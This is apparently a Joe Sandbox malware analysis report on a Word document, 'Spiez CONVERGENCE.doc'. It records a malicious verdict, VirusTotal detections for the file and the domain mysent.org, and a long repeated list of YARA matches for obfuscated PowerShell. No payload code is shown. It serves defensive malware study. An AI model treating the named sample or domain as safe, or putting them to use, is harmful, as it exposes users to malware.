Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:586205
Start time:13:44:02
Joe Sandbox Product:Cloud
Start date:19.06.2018
Overall analysis duration:0h 9m 53s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Spiez CONVERGENCE.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:38
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.expl.evad.winDOC@52/33@16/3
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 1
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 0
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
  • Execution Graph export aborted for target mshta.exe, PID 4000 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, powershell.exe, powershell.exe

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: mysent.orgvirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Spiez CONVERGENCE.docvirustotal: Detection: 52%Perma Link
Yara signature matchShow sources
Source: 00000001.00000002.16470021362.05457000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000001.00000002.16471643789.05D66000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000001.00000002.16479129493.07B20000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000000.16251752367.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000000.16251811007.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000000.16251871858.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000000.16251952862.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000002.16511624641.000C0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000002.16511858528.004E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000002.16511656893.000E8000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000002.16511692083.000FE000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000002.00000003.16252061690.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000000.16252582166.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000000.16252700862.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000000.16252640147.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000000.16252495561.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000002.16516367054.00240000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000003.16252867730.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000000.16252991335.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000000.16253360353.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000000.16253534240.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000002.16254060832.00280000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000002.16254080364.002A7000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000002.16254122513.00410000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000003.16253657832.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000000.16253760975.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000000.16253931601.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000000.16254018589.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000000.16254142755.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000005.00000000.16253457890.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16517606816.002E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16517720716.00370000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16518717374.01280000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16518634850.01260000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16518183828.005A0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000002.16516412332.00350000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000002.16516456299.0038D000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000004.00000002.16516425523.00377000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16254299738.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257125734.00386000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257155189.00355000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257356049.0035A000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257308570.0032B000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000000.16266903266.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000003.16257262767.00310000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000000.16269518741.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000000.16269739444.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000000.16269838618.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16278676993.000B0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000006.00000002.16517628488.00307000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16278810878.00114000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16280469364.007F0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16280477576.00800000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16278760458.000F7000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16280487798.00810000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16278724742.000D0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000003.16270011304.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16280536226.0158D000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000008.00000002.16289167708.00123000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000002.16313509174.004C4000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000002.16313596373.00504000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000002.16313702173.00534000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000002.16313610905.0050D000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16297070594.0053A000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298019408.005CA000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298064731.005CB000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298398000.0052D000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298407717.00530000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16298971996.004D1000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16299132829.0052D000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16299341957.00530000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300255520.0052D000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300263613.00530000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300337195.004C3000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300979933.0052D000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16300788955.00530000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000007.00000002.16281065527.01F78000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16302598190.00504000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16303926726.00504000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16304261000.005B8000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16304546872.005BA000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16304603512.005BD000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16305887929.005C0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 00000009.00000003.16296997137.0052F000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000000.16296484704.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000000.16296593702.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000000.16296702253.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000000.16296808424.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525541083.00150000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525844730.003F8000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000003.16296929519.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000003.16298971392.003E1000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000003.16298807624.003FC000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000003.16298689577.003F1000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000000.16297805127.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000000.16298307990.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000000.16298524959.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000000.16298084982.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525795636.003E1000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000002.16530163707.00396000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000002.16530128762.00370000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525712693.003B0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000A.00000002.16525762372.003D7000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000002.16530199944.003A5000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000002.16530262653.005E0000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
Source: 0000000C.00000003.16298709914.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, score =
